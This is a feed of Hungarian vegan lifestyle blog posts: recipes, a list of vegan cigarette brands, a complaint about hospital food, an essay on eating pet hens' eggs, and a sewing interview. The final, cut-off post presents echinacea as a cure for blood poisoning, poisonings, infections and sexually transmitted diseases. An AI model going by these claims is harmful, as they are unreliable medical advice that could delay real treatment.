Már Magyarországon is egyre több helyen lehet kapni vegán majonézt (pl. Aldiban gyakran árulnak), Angliában pedig 3 üzletlánc is van, ahol biztos beszerezhető (Wholefood, H&B, Grapetree). Mostanában férjem két dolgot nagyon szeret: krumplit és kukoricát. Minap munkából hazafelé jövet bementem egy nagy üzletbe, megnéztem, van-e napvégi zöldség-gyümölcs leárazás. Az egyik polcon jópár majonézes salátát láttam. Fejemben rögtön összeállt, hogy férjem minden bizonnyal szívesen enne majonézes kukoricát, így hazaérve gyors el is készítettem. Ez nem 30 perces recept, mert 10-15 perc alatt kész. A recept: Hozzávalók: - 1 nagyobb bögre főtt kukorica - 1/2 kígyóuborka - só - 2 dl növényi joghurt - 2 kanál növényi majonéz - 1 kiskanál mustár (opcionális, én kihagytam) Elkészítés: Ha fagyasztott kukoricánk van, akkor kevés vízben egy csipetnyi sóval fedő alatt megpároljuk, ha konyervet használunk, nem szükséges. Amíg a kukorica megpuhul, az uborkát megmossuk és kis kockákra felaprítjuk. A joghurtot, a majonézt és a mustárt összekeverjük egy tálban. Az arányok ízlés szerint változtathatók. A megpárolt, leszűrt, kicsit kihűlt kukoricát és a felaprított uborkát összekeverjük a kész szósszal. El is készült a saláta. Érdemes hideg helyre tenni és megvárni míg lehűl. Pirítós kenyérrel is fogyaszthatjuk, de alkalmas valamilyen főétel kísérőjeként is. Férjemnek Linda McCartney vegán kolbászt sütöttem hozzá. Magyarországon is vannak húsmentes kolbász és virslifélék.
Reggelire fel! Málnás chia puding superfoodokkal (gluténmentes, laktózmentes, tojásmentes, nyers vegán)
Korábban már hoztam nektek a Zöld Avocado vegetáriánus gasztroblogon két gyönyörűszép és nagyon tápláló chia puding receptet. Egy csokis-kókuszos és egy szőlős chia reggelit. A recepteket itt találjátok. A mostani bejegyzésben egy "szuperételes" chia puding kerül az asztalra. Egy tálnyi "szuperegészség", szuper gyorsan, szuper finoman reggelire. málnás chia puding superfoodokkal (mindenmentes, nyers vegán) HOZZÁVALÓK (1 személyre) - 2 dl kókusztej ital - 1 db érett banán - 1 marék friss málna - 2 ek chia mag - 1 tk frissen darált lenmag - 2 ek kendermag - 1 marék natúr kesudió - 1 marék aszalt goji bogyó ELKÉSZÍTÉSA kókusztej italt a banánnal és a málnával összeturmixoljuk. Kitöltjük egy müzlistálba. Belekeverjük a lenmagot és a chia magot, majd félretesszük kb. 45 percre, hogy legyen ideje sűrűsödni, pudingosodni. Mielőtt elfogyasztanánk hozzá adjuk a kesudiót, a kendermagot és a goji bogyót. Most már kezdődhet a nap! ;-) málnás chia puding superfoodokkal (mindenmentes, nyers vegán) Táplálkozz, ne csak étkezz! Jó étvágyat! :-) MIÉRT NEVEZIK SUPERFOODOKNAK A HOZZÁVALÓKAT? A chia magról bővebben itt olvashatsz: http://www.originalchia.hu/tapanyagtartalom/ A kendermagról bővebben itt olvashatsz: http://ossejt-terapia.shp.hu/hpc/web.php... A lenmagról bővebben itt olvashatsz: http://hajraegeszseg.hu/cikk/2014-11-09/egyunk-lenmagot A kesudióról bővebben itt olvashatsz:http://napidoktor.hu/blog/termeszetesen/a-kesudio-15-elonye/ A kókusztejről bővebben itt olvashatsz: http://www.biocity.hu/b.../a-keleti-konyha-kincse-a-kokusztej/ A goji bogyóról bővebben itt olvashatsz:http://www.liciumgyumolcs.hu/tenyek.html A málnáról bővebben itt olvashatsz:http://veddamagyart.info/elelmi.../669-naponta-3x3-hazai-malna Az érett banánról bővebben itt olvashatsz: http://filantropikum.com/ezert-fogyasszunk-minel-tobb-barn.../
Vegán cigaretta és dohánytermékek
A nagy dohánygyártó cégek mindegyike folytat állatkísérleteket, de a dohányzó vegánoknak is van megoldás, mivel létezik vegán cigaretta. A dohányzás nem vegán alapvetően, mivel minden nagyobb cég folytat állatkísérleteket. Azonban ha valaki vegán és mégis komolyan gondolja a dohányzást úgy nem kell kétségbe esnie, mivel van számára megoldás. Vannak ugyanis olyan dohánygyártók akik erőszakmentesen, azaz állatkísérleteket mellőzve gyártják termékeiket. Alább olvashatjátok listázva az erőszakmentes cigaretta márkákat. American Spirits “ex”vegán cigaretta Az American Spirits papíron vegán cigaretta, azonban amióta a Reynolds vállalat felvásárolta nem számít annak. A Reynolds híres az állatkísérleteiről, tehát az American Spirit már csak adalékanyagmentes cigarettának számít. Manitou vegán cigaretta A Manitou termékeit a Joh. Wilh. von Eicken cég gyártja. A Manitou elismerten vegán dohánytermékeket gyárt, így nyugodt szívvel szívhatod, ha kedved tartja. Pueblo vegán cigaretta A Pueblo cigarettát és dohánytermékeket a német Pöschl Tabak vállalat gyártja. Nem csak vegán és adalékanyagmentes cigarettáról van szó, mely Magyarországon is könnyen beszerezhető. A szortimentjükben szerepel cigaretta, dohány és papírcső is. Pepe vegán cigaretta A Pepe dohánytermékeit, épp úgy mint a Manitou termékeit a Joh. Wilh. von Eicken cég gyártja. Tehát vegán termékekről van szó és ha találsz belőle magyar dohányboltokban, akkor veheted bátran, ráadásul magyar dohányboltok polcain is hozzá lehet jutni elvileg. Red Bull vegán cigaretta Az energiaitalhoz hasonló névvel ellátott cigaretta is a vegán termékek közé tartozik, gyártója a Pueblot is előállító Pöschl Tabak. Winston “ex”vegán cigaretta A Winstonnal ugyanaz a helyez, mint az American Spirittel. Papíron ez is vegán, de a Reynolds cég felvásárolta, így elvesztette ezt a címkét. Már csak adalékanyagmentesnek jelölhetik, mivel az anyavállalat folytat kísérleteket. Yuma vegán cigaretta A Yuma dohányát a Yuma Europe cég gyártja és termékei elismerten vegánok. A dohány cserjét organikus gazdálkodásban nevelik és az elkészítésnél sem adnak hozzá semmilyen adalékanyagot. Az erőszakmentes cigaretta témájában talált információkat nem tartom eléggé biztos lábon állónak. Ha bármilyen hiteles forrást találsz a témát illetően mely ellentmond az általam közöltekkel, akkor kérlek ne légy rest és kommenteld a cikk alá forrással, hogy javíthassam azt. Valamint ha tudomásod van olyan cigaretta márkáról mely vegánnak minősül akkor azt is oszd meg, hogy naprakész lehessen a cikk a vegán dohányosok számára. Mivel én nem dohányzom így arról sincs pontos információm, hogy melyik cigarettát lehet itthon kapni a Pueblo-n és a Pepe-n kívül. Kapcsolódó cikkek és források a TheCheatInVegan és a Wemachtwas oldalakon találhatóak
Egy vegán Kínában (1.0)
Hogyan éljünk túl vegánként egy másik országban? Egyszerűen! Magyarországon és azon túl is könnyen és még könnyebben élhetsz tiszta vegán életet. A szupermarketek polcain már megtalálhatók a vegán helyettesítők is. De mi van azzal, aki keletre indul meg? Sőt, távol- keletre? Az hogyan éljen növényi alapokon? Ott, ahol még a betűk világában is nehéz eligazodni?! Virág bebizonyította, hogy igenis lehetséges egy teljesen más kultúrában, méghozzá Kínában is folytatni életmódját. A kezdeti
Citromfüves-epres smoothie
Már lehet magyar epret vásárolni, de mivel még "aranyárban" van, ezért csak egy kevéskét vettem. De hogy sokáig élvezzem ezt a csodás ízt, ezért turmixot készítettem belőle. Csak pár perc, de maga a mennyország. :) Hozzávalók: - 2 banán - 2 marék magyar eper - rizstej vagy víz - késhegynyi fahéj - 2-3 szem aszalt szilva (elhagyható) - 2-3 levélke citromfű Nagy elkészítési mód nincs hozzá, egyszerűen turmixolj mindent össze. Annyi rizstejet tegyél bele, amennyire szeretnéd, hogy iható állaga legyen.
A harmadik születésnapi torta
Hihetetlen, de újra eltelt egy év! Április 30-án Ádi három éves lett! Ahogy minden eddigi szülinapjára, most is piknikkel készültem és mivel a szülinap most szombatra esett, egyértelmű volt, hogy a biopiacon fogjuk megtartani a piknikezős-játszóterezős-dumcsizós bulit családtagokkal és néhány baráttal. Előtte pénteken egész nap a konyhában sürögtem-forogtam, hogy minden készen legyen másnapra… hála a szüleimnek, akik vállalták a srácok felügyeletét és két szoptatás között igyekeztem mindig minél több mindent megcsinálni. Természetesen a tortát titokban csináltam, akkor, amikor teljesen egyedül voltam, aztán gyorsan bedugtam a mélyhűtőbe, hogy az ünnepelt ne láthassa másnap délelőttig. Nyers tortát készítettem. Meg akartam hagyni a csokoládés ízvilágot, mint az első és a második tortánál, de vittem bele egy kis gyümölcsösséget málnával, mert Ádi imádja a málnát, meg a többi bogyós gyümölcsöt is (eper, áfonya, ribizli). Eredetileg márvány tortának terveztem, gondoltam, hogy a két ízt összeöntöm és márványosan összekeverem, de mivel a krém nem lett olyan híg, mint gondoltam, így inkább rétegeztem a tortát, és lett belőle egy nyers málnás-csokoládés “sajttorta” (cheesecake). Nagyon jól passzol a savanykás málna réteg a kesernyés csokival és az édeskés alappal. Az ünnepelt Ádi pedig igazi kiskrapekká cseperedik. Hihetetlen beindult a dumálókája. Ilyeneket mond: “Hm, úgy gondolom, hogy most nem megyek veled a boltba!” vagy a másik cuki dolog: “Anya, ebben (mosógép) vagy van mosópor vagy nem.” – ilyen vagy-vagyos mondatokat mond sokszor és egy három évesnek megfelelően sokkal logikusabban használja a magyar nyelvet, nem mindig a “nyelvtani szabályoknak megfelelően”, mint mi felnőttek. Néha ledöbbenünk, hogy mennyi mindent lát, észrevesz, tapasztal a világból. Fantasztikus a humora, a memóriája, nagyon ügyesen megtanult rollerezni és imádja (gyömöszölni) a kisöccsét. Boldog születésnapot kisfiunk! Nagyon-nagyon szeretünk téged! Anya, Apa és Ákos “Három éves lettem!” Nyers vegán málnás-csokoládés sajttorta Hozzávalók (egy 18 cm-es kapcsos formához): Alaphoz: – 1 bögre mandula – 1 és 1/2 bögre friss datolya, kimagozva (aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) – 1/4 teáskanál Himalaya só Alap krémhez: – 2 bögre kesudió, vízben áztatva 4-5 órán (vagy egy éjszakán) át, majd leszűrve – 1/3 bögre nyers extra szűz kókuszzsír (jó, a nem nyers extra szűz változat is, az nem kókusz ízű) – 1/3 bögre juharszirup – 1 vaníliarúd kikapart magjai Málnáshoz: – 1/2 alap krém – 3/4 bögre fagyasztott málna – 1 evőkanál frissen facsart citromlé – 4 evőkanál víz Csokoládéshoz: – 1/2 alap krém – 2 evőkanál nyers kakaópor – 2 evőkanál karobpor (lehet csak kakaóval vagy csak karobbal készíteni) – 1 evőkanál kesudióvaj – 10 evőkanál zabtej (bármilyen növényi tej használható) – csipet só (A recepthez használt bögre 250 ml-es.) Tegyük a mandulát a robotgépbe és aprítsuk szemcsésre. Ekkor adjuk hozzá a datolyát és sót és dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. A tortaformát béleljük ki folpackkal vagy kenjük ki kókuszolajjal és nyomkodjuk az aljába a datolyás mandulás keveréket, majd tegyük a mélyhűtőbe megkeményedni, amíg elkészítjük a többi réteget. Mossuk el a robotgép tartályát. A krém elkészítéséhez szűrjük le a vizet a kesudióról. Tegyük a kesut a kókuszzsírral, a juharsziruppal és vaníliával a robotgépbe és kezdjük el pürésíteni. Ha teljesen sima, akkor vegyük ki a krém felét és tegyük félre. A robotgépben maradt fél krémhez adjuk a málnát, a citromlevet és vizet, pürésítsük simára, majd kanalazzuk az alapra és tegyük vissza a hűtőbe. Mossuk el a robotgép tartályát. Tegyük a robotgépbe a maradék fél krémet, adjuk hozzá a kakaóport, a karobport, a kesudióvajat, zabtejet és sót. Pürésítsük simára, majd kanalazzuk a málnás krémre. Tegyük a mélyhűtőbe a tortát néhány órára, amíg megszilárdul, szeletelhetővé válik, de nem túl kemény.
Mit eszik a vega beteg/páciens a kórházban?
2016. április 14. Zizi kalandjai
Reggeli: kifli, Ráma margarin, egy szelet sajt Mit eszik a vega beteg vagy az én esetemben a kismama, ugyanis nem betegként voltam kórházban, hanem a szülés miatt… igen rendhagyó és kalandos szülés miatt. Na semmi baj nem volt, inkább viccesnek mondanám, olyan sztorinak, amit még az unokáinknak is mesélni fogunk. Szóval három óra alatt (!!!) lezajlott az enyhe fájdalmaktól kezdve a szülésig Ákos ezen világra érkezése, majd a kórházban kellett töltenünk 72 órát… jó hosszú 72 órát, már alig vártuk, hogy kiszabaduljunk. Ezen idő alatt volt időm szemrevételezni és lefotózni (bocsánat a képek minősége miatt, telefonnal, elég rossz megvilágításban készültek) az ételek zömét, amit felszolgáltak vegetáriánus fogásokként… node a húst fogyasztók sem voltak szerencsésebbek nálam, vagyis ők sem úgy távoztak az asztaltól, hogy ez volt életük legfinomabb Michelin csillagos fogása. Ebéd: alap “zöldségleves”, rizs répával és reszelt sajttal, cseresznye befőtt Nem tudom, hogy kik állítják össze az étrendet, de tápértékileg szinte egyenlő a nullával. Azt meg tudom érteni vagy el tudom fogadni, hogy kevés pénzből kell kihozniuk sokat, de azt nem tudom elfogadni, hogy évtizedek óta nem változtatnak például a tökfőzelék receptjén, azaz nem agyoncukrozottan és agyonecetezetten kellene főzniük, hanem hagymával és sóval, no meg némi kaporral (nem hiszem, hogy a hagyma többe kerül, mint az ecet és a cukor!). Biztos vagyok benne, hogy a gyerekek többsége – többek között én is ilyen voltam – azért utálja a tökfőzeléket, mert a menzákon cukrosan és ecetesen készítik. Aztán egyszer meg mertem kóstolni anyukám tökfőzelékét és elkezdtem szeretni… rájöttem, hogy ez nagyon finom (és rendszeresen főzöm is nyáron). Miért nem lehet változtatni a közétkeztetésben a begyepesedett cukros, ecetes tökfőzelék recepten még hosszú évek után sem? Oknyomozó fotóriporterként néhány dolgot megkóstoltam (kiskanálnyi mennyiség) a kórházban, csak, hogy ne írjak olyanról, amit nem is tapasztaltam meg. Vegán étrend nem is kérhető (az ételek ettől függetlenül vegán volt), vegetáriánus, laktóz- és talán gluténmentes, valamint diétás (ez mit takart, nem tudom) létezik (legalábbis, ahol voltam). A reggelik elég egyhangúak: kifli vagy zsemle margarinnal, cukros vagy cukormentes tejeskávé vagy tea, néha egy szelet sajt. Az ebéd mindig levessel indul, valamilyen főfogás és befőtt vagy desszert (túró rudi) követi. Vacsorára szinte semmit sem hoztak, lepakoltak néhány zacskó kiflit vagy zsemlét, amihez a szokásos margarint adták. Szóval ezeket adják kismamáknak, éppen szoptatást kezdő anyukáknak vegetáriánus ételként 2016-ban Magyarországon egy kórházban (de gondolom a többiben is hasonlót). A 72 óra alatt nem kaptam egyetlen egyszer sem valamilyen nyers zöldséget vagy gyümölcsöt… jó, persze január volt – nem friss zöldségekben, gyümölcsökben gazdag szezon -, de azért egy almát vagy körtét vagy egy szál sárgarépát adhattak volna. A változatosság gyönyörködtet… újabb reggeli: zsemle margarinnal (kés, tányér, szalvéta otthonról) Ebéd: alap “zöldségleves”, az a bizonyos borzasztóan cukros ecetes tökfőzelék burgonyakrokettel és túró rudi Szerencse, hogy a család ellátott tápláló ételekkel – gyümölcsökkel, teljeskiörlésű pékáruval, magokkal, napi egyszeri főtt étellel – és nem kellett éheznem. Persze elgondolkoztam azon, hogy hogyan lehetne változtatni a rendszeren, a felszolgált ételeken. Továbbképzés, receptek megváltoztatása minden bizonnyal segítene, az ízetlen ételeket igenis lehet ízessé tenni egy kis kreativitással még akkor is, ha kevés pénz áll rendelkezésre. Szokásos reggeli… a mandarint nem a kórház adta, a család hozta be nekem! Ebéd: felismerhetetlen ízű és drapp színű teljesen üres leves, krumplis tészta savanyú uborkával, almakompót Szerintetek min kellene változtatni? Ti hogyan reformálnátok meg a kórházi étkeztetést? Még többet a témáról: Kórházi koszt – Facebook oldal Zöld Ella – Vegánként túlélni a kórházat Milyen a hazai kórházi koszt?
,,A tojás úgysem kell a tyúknak - avagy a ,,vegán állathasználat elmélete
Egyre többször futok bele a kérdésbe vegán körökben: ha hobbiból tartok egy tyúkot - sőt, esetleg egy örökbefogadott, mentett tyúkot! - és szeretem, akkor van-e jogom elfogyasztani az ő tojásait, amiket ,,amúgy is otthagyna? Az ilyen kérdések végére akár oda is biggyeszthetnénk a Karinthy-szófordulatot: És ha igen, miért nem? Mert a válasz igen is, meg nem is. Miért igen? Na, ez az a térfél, amelyik mellett vegán csoportokban különösen merész dolog érvelni. Mivel a veganizmus definíció szinten tartalmazza az állathasználat és az állati termékek elutasítását, ebből szükségszerűen következik, hogy a tojás sem etikus. A vita kedvéért vizsgáljuk meg ezt a nézőpontot is. Azzal, hogy az állathasználat nem vegán, senki sem akar vitatkozni. A valódi kérdés ebben az esetben az, hogy mi az, amit állathasználatnak tekintünk. Hogy jobban átlássuk az érmének ezt az oldalát, a saját életemből hoznék egy példát: újdonsült, de annál fanatikusabb macskásnéni lévén sokat böngészek macskás felszerelések, ajándéktárgyak, kreatív, ,,csináld magad dolgok után. Nemrégiben egy különös könyvbe futottam bele, melynek címe: Crafting with cat hair, azaz Kézművesség macskaszőrrel. Ítélkezést kezdd meg! :D Viccet félretéve: bennem komolyan felmerült a kérdés, hogy miután tavasszal úgyis annyit vedlik az én szemem fénye, vajon tényleg készíthetnék-e a borítón látható kis ujjbábokhoz hasonló cukiságokat a kihullott szőréből, és ha igen, az vegán dolog lenne-e. Mármint, állati termék? Igen. Okoz szenvedést bárkinek? Nem. Profitálok belőle? Pár egyedi dísztárgyat leszámítva nem. De tényleg, van külön fésűm hozzá, amivel össze tudom gyűjteni a szőrét, és amit egyébként is használok rajta, ergo maga a macska semmi újdonságon nem menne keresztül, az pedig szerintem magától értetődő, hogy az ember nem azért fogad örökbe egy kóbor macskát, hogy aztán cicaszőr kesztyűkkel menőzhessen - legalábbis remélem. Ezt az analógiát átvezetve a hobbityúkokra: ha egyébként is tojnak tojást, és nincsenek jóképű kakasok az életükben, tehát megtermékenyítetlen tojást tojnak, amivel nincsenek további szándékaik, mint otthagyni ahol éppen kiesett, van-e jogunk azokat összegyűjteni és megenni? Miért nem? Habár ez a nézőpont átlagosan sokkal népszerűbb az igenlőnél, számomra mégis nehezebb volt érvelni mellette. Ha nem fáj a tyúknak, és szeretetből tartom, a rántotta csak egy kedvező mellékterméke a helyzetnek, akkor miért ne (t)ehetném? Azért nem, mert azt senki nem tudja, nem fogja leellenőrizni, hogy tényleg nem fáj-e a tyúknak, és tényleg szeretetből tartod-e. Mert felveti a kérdést, hogy akkor a bio, szabadtartásos, humánus farmoknak is van-e akkor létjogosultságuk, holott erre már egy tökéletesen egyértelmű NEM a válasz. Ha elfogadjuk azt, hogy egy szeretett, hobbiból tartott állatot hasznosítunk, azzal legitimizáljuk az állathasználatot, csupán bizonyos feltételeket szabunk köré. Visszatérünk az állatjóléti megközelítéshez, az állatjogi helyett. Onnan pedig már csak egy lépés a bio tejüzem, ahol a kisbocik önként adják nekünk az anyatejüket, a házi sajtok, a kistermelői mézek, és a már sokat emlegetett házi tojás, ahol a ,,kiöregedett, egyre kevesebbet tojó tyúk a profit csökkenésével - minden bizonnyal természetes úton, végelgyengülésben - elhalálozik. És ha már úgyis ott van a húsa, ami ugye neki már nem kell... Le szeretném szögezni, nem feltételezem, hogy bármelyik felelős vegán támogatná a fentebb említett esetek legitimizálását. Kifejezetten az ellenkezője igaz. Éppen ezért fontos, hogy felismerjük a hasonló helyzetek mögöttes tartalmát, gesztus-értékét, súlyát, és nemet mondjuk az állathasználatra. Minden formájában. De hát akkor mit csináljak a tojással? Nagyon egyszerű: hagyd ott, ahol van. Talán elsőre furcsán hangozhat, de a tyúkok a legtöbb esetben előbb vagy utóbb megeszik a saját, megtermékenyítetlen tojásaikat. Ennek a jelenségnek az a magyarázata, hogy egy tyúknak ahhoz, hogy egy tojás kifejlődjön a szervezetében, relatíve sok kalciumot kell felhasználnia, különösen a tojás héjának megalkotásához. Ennél fogva, amíg egy fészekaljnyi tojást tojik, rengeteg kalcium távozik a szervezetéből, és ha látja, hogy a tojásai nem fognak kikelni - ebben a felismerésben segíthetünk neki, ha kicsit megrepesztjük vagy megtörjük őket - egész egyszerűen ,,visszaszerzi az elvesztett kalciummennyiséget, említett tojások elfogyasztásával. Összefoglalva tehát, ha a tyúkod folyamatosan tojja a felesleges tojásokat, egy darabig hagyd figyelmen kívül - miután végzett az általa várt mennyiséggel, abba fogja hagyni. Ha ez megtörtént, egy kis helyen megtörheted a tojásokat, finoman rávezetve Tyúkanyót, hogy ezeken már nem érdemes kotlania. Miután pedig feltalálta magát... nos, kívánj neki jó étvágyat! Petra Shura The post ,,A tojás úgysem kell a tyúknak - avagy a ,,vegán állathasználat elmélete appeared first on VegaNinja.
A hobbi varrás ereje, avagy a fast fashion nem menő!
2016. április 10. Vegán lettem
A hobbi varrás kisebb ökológiai lábnyommal, nagyobb tudatossággal és a valódi egyéniséggel jár. Vegán alapanyagokból természetesen! Hobbi varrás Vanyolai Réka a Vegán Lettem blog első interjú alanya, aki ugyan nem vegán, de tudatossága és motivációja figyelemreméltó és példaértékű. Első találkozásunk e témában a “Miért lettem vegán?” bejegyzésem facebook posztja alatt esett meg, ahol finoman utalt rá, hogy az állatok mellett mennyi kiszolgáltatott ember – éhbérért dolgozó férfiak, nők és gyermekmunkások – szenved a földön. Mindez a pazarló, túlzó vágyakkal és igényekkel teli életvitelünk miatt. Ezen a ponton kaptam fel a fejem, ugyanis ez egy ugyanolyan banális megállapítás, minthogy az állatok szenvednek és meghalnak ugyancsak életvitelünk miatt. Mégis bármennyire hétköznapi információk ezek, nagyon kevesen foglalkoznak vele. Pedig egyik sem szükségszerű! Réka foglalkozik vele és tesz is azért, hogy kevesebb gyermeknek kelljen dolgoznia egy dohos raktárépületben napi pár centért, hogy te Nike, Gucci, Adidas és Zara ruhákban járhass. Légy olyan mint Réka, próbáld ki az otthon varrást! Hogyan jött a hobbi varrás? Már gyerekkoromtól kezdve törekedtem arra, hogy minél több formában kifejezzem magam. Kamaszként ytong szobrokat faragtam otthon, hímeztem, mandalákat színeztem, de sokat festettem a fősulis évek alatt főleg replikákat, aztán velencei gipsz maszkokat öntöttem és díszítettem, nem is olyan régen pedig fazekas tanfolyamra jártam. Nem vagyok polihisztor, nehogy azt hidd, inkább az ikrek jegyben születettek áldását/átkát hordozom: sok mindenben jó, de semminek sem a mestere. Egyébként nagyapám szabó volt egy időben, a nagymamám pedig már kamaszkorától kezdve varrt - annyira ügyes volt, hogy a falujában más asszonyoknak is ő készítette a ruháit. Apai és anyai ági nagynénéim is varrnak, édesanyám inkább háztartási dolgokat varr otthon: függönyt, terítőt, párnát, felhajtja a nadrágszárat stb. Mindezek ellenére gyerekként egyáltalán nem érdekelt a varrás. A varrógépet borzasztóan bonyolultnak találtam, szintúgy a kötést, nálam a hímzésnél állt meg a tudomány. A divat is viszonylag későn kezdett érdekelni, de aztán látod hol kötöttem ki. De akkor mi volt a motivációd amikor elkezdtél otthon varrni? Idővel észrevettem, hogy a plázákban a fast fashion boltokban a ruhák tapintása egyre pocsékabb, vagyis egyre rosszabb minőségű ruhákat kínálnak. A bőröm alapvetően száraz, nagyon érzékeny vagyok az anyagokra. Az utóbbi években olyan érzésem volt, mintha műanyagot akarnának rám sózni. Emellett a buddhizmus előtérbe került az életemben, vele együtt az erőszakmentesség gondolata és pontosan tudtam mennyi ember szenved ezek miatt a ruhák miatt. Ezen a vonalon nagyon erős hatással volt rám a Sweatshop dokumentumfilm sorozat, amiben három norvég fashion blogger utazik Kambodzsába, és ismerkedik meg a sweatshopok világával, az ott dolgozókkal. Persze a hírekbe időről-időre bekerültek hasonló tények, hogy a menő márkák milyen szinten kihasználják az olcsó munkaerőt, hogy egy 40 000 Ft-os cipő eladásából milyen kevéske jut a készítőjének. Zavar, hogy a termékek ilyen messziről jönnek hozzánk, a szállításuk elképesztő módon szennyezi a környezetet. Zavar, hogy valaki 12 órát dolgozik heti 7 nap, fillérekért. Úgy döntöttem felépítem a saját ruhatáramat az erőszakmentesség jegyében. Magyarul én izzadjak azokért a darabokért, amiket hordok és ne más. Ez volt 2015. nyarán. (IDE kattintva láthattok egy szemléletes videót a témában.) Kicsit még visszakanyarodva elszoktunk a szabóktól. Idegen az a világ, legalábbis az én generációm számára. Egy fiatal nem tudja megfizetni mondjuk azt, hogy kabátot varrasson magának, mindegy, hogy az a kabát egy-két évtizedig jó lenne. Szóval nehéz ügy, mert sokan inkább költenek keveset de sokszor, minthogy egyszerre nagyobb összeget kifizessenek valami tartós dologért. Mellette ott van a divat, ami évszakról-évszakra változik. Hogyan kezdtél varrni? Kötni főleg könyvekből, youtube-ról, blogokról tanultam, majd jött a varrás egy 4×4 órás tanfolyamon. Eleinte párnahuzatot, játékbabát, szoknyát, néhány ruhát varrtam otthon, aztán megtaláltam a világ eldugott kis szegletén a hobbi fehérnemű varrókat. Na, az olyan volt, mint a villámcsapás. Olyan szép fehérneműket készítettek sima, háztartási gépekkel, amikről csak álmodni lehet. Finom csipke melltartók hada, hát melyik nő nem érzi ilyenkor a késztetést, hogy ezt is kipróbálja? Úgyhogy kb. fél évet töltöttem azzal, hogy megtanuljam és elsajátítsam a fehérnemű varrást. Ez igazi nagy szerelem lett. De minden darab a gyermekem, engem fejeznek ki. Ismerem a ruhák minden szegletét, tudom, hogy melyik résznél voltam boldog, amikor az a vállrész végre jól sikerült, vagy tudom, mikor voltam ideges, amikor harmadszorra is szét kellett bontani a varrást, mert valami nem úgy jött össze, ahogy elgondoltam. A felsoroltak mellett milyen ruhákat varrsz és milyen alapanyagokból? Nagyon szeretem az egészruhákat, a nőiesebb sziluetteket preferálom. Sajnos a zsákszerű, minimalista északi dizájn nem az én világom, borzasztóan is állnak. Szeretem a testhezálló, karcsúsított darabokat - épp most készültem el egy ruhával, ami szerintem a tavaszi-nyári nagy kedvencem lesz, kötött anyagból, pamut jersey-ből készült. Általánosságban persze a kötött anyagokkal nehezebb dolgozni, de a konstrukció egyszerűbb. Szeretem a ceruzaszoknyákat is, a magas derekú nadrágokat, illetve a blúzokat. El tudod képzelni micsoda boldogságot okozott, amikor jól sikerültek a gomblyukak a blúzomon? (nevet) Alapanyagokat tekintve, ahogy arra már utaltam a tiszta poliésztert kerülöm. Nagy kedvencem a hófehér pamut batiszt. Rusztikus, vintage hangulatú, csodálatos anyagnak tartom, de nagy általánosságban elmondható, hogy főleg pamut párti vagyok. Szeretem használni a pamut jersey és a pamut karton anyagokat is. A viszkózt is nagyon szeretem, bár nem természetes anyag, mégis a természetes alapú vegyi szálak közé tartozik. Cellulóz felhasználásával készül, azt pedig fenyőből, bükkből nyerik. Tehát általánosságban növényi eredetű textilekkel dolgozom, műszállal ritkán. A fehérnemű varrás megint más tészta, rengeteg alkatrész kell például egy szivacsos, merevítős melltartóhoz, a fő alapanyag vagy valamilyen mikroszálas anyag, például lycra, vagy csipke, ezeket kombinálom rugalmas béléssel, ami szintén mikroszálas. Hogyan készíted ezeket a ruhákat? Sok helyről szerzek be szabásmintát, de fehérneműket már készítek saját tervezés alapján is. Ez azt jelenti, hogy a szabásmintát én szerkesztem ceruzával, körzővel, vonalzóval. Ugyanakkor szeretem támogatni az indie szabásminta tervezőket, van is néhány kedvencem, akiktől szoktam vásárolni online. Most szereztem be nemrég egy könyvet, ami több mint 200 féle ruhavariáción át vezet úgy, hogy nekem kell variálgatnom szerkesztéssel a szoknya-, a felső-, az ujj- és a nyakkivágás alap szabásmintáit. De már lemásoltam kétszer az egyik kedvenc pólóruhámat, nagyon szeretem a fazonját és nagyon könnyű megvarrni. A szabás után sima háztartási géppel varrok, nincs még se fedőzőm, se lockolóm. Az anyagokat egy a munkahelyem közelében lévő csodálatos méterárú boltból szerzem be. Ott csak európai textileket forgalmaznak, a padlótól a plafonig francia, olasz és német kiváló minőségű anyagok közül tudok válogatni. Egyébként általában este 6-7 órától varrok kb. 10-11-ig, szinte minden nap. Környezeted hogy reagál erre a hobbira? Hobbinak tekinthető a varrás nálad egyáltalán? Inkább szenvedély, passzió. A környezetem elismeri a munkám és persze a családot is igyekszem meglepni időnként valami hasznos dologgal. A páromnak múlt héten nyakkendőt varrtam, az is új kihívás volt a számomra. Gondolkoztál már azon, hogy a hobbi varrásból élj? Lehet, hogy klisének hangzik, de a magyar fizetések sajnos nem arra vannak berendezkedve, hogy életvitelszerűen varrassanak maguknak az emberek. Engem is addig boldogít ez a mesterség, amíg szenvedélyből csinálhatom. Ha állandóan másoknak, megrendelésre kéne készítenem darabokat, elvesztené a varázsát. Viszont éppen most próbáltam ki magam oktatóként, egy workshop keretein belül, ahol fehérnemű varrást tanítottam. Nagyon éveztem és ez igazi unikumnak számított itt Magyarországon, tudtommal nem folyik semmilyen hasonló oktatás hobbi varrónőknek. Ha egy általad kreált ruhán keresztül kellene bemutatni magad, melyik lenne az? Ez nehéz kérdés, mert mindegyikben ott vagyok, de talán a legutolsó, virágos egész ruha az, ami én vagyok. Színes, virágos, vidám, de nem giccses, puha, nagyon rugalmas, de szívós, nem szakad el. Bár testhezálló, de nem kihívó. Ő én vagyok. Ha felkeltette érdeklődésed az hobbi varrás, vagy csak feltennél pár kérdést Rékának azt az alábbi e-mail címen teheted meg: szofisztik@gmail.com Réka hobbi varrás és fashion témájú blogja: http://www.redheels.eu
Az echinacea hatásai
2016. április 5. Élj harmóniában
Az echinacea egyre népszerűbb gyógynövény Magyarországon is. A növénynek a gyökért használják fel és itthon leginkább influenza esetén szokták alkalmazni. Az ájurvédában keserű, pikáns , hűtő hatású gyógynövénynek számít. Hatással van a vérkeringésre, nyirokrendszerre és a légzésre is. Természetes növényi antibiotikum és a legtöbb méreg hatását legyőzi a szervezetben. Elsődlegesen a vérben és a tüdőben fejti ki a hatását, így nagyon jól alkalmazható influenza és légúti betegségeknél. Nagyon jó vértisztító, baktériumölő, vírusölő és fertőtlenítő szer, valamint fájdalomcsillapítóként is használható. Nem csak a vért, de a nyirokrendszert is jól tisztítja. Vérmérgezésre, illetve bármilyen olyan állapotban amikor a vértoxicitása áll fenn használható. Ekcémánál, mérgező marásoknál, kiütéseknél alkalmazható. Borogatásként vagy lemosószerként jó elfertőződött sebekre, mérges marásokra. Fertőzések, sebek, tályogok, gyulladások is kezelhetőek vele. Ájurvéda prosztata problémákra és nemi betegségekre is használja. Minél frissebben használd, mert 6 hónap után elveszíti a 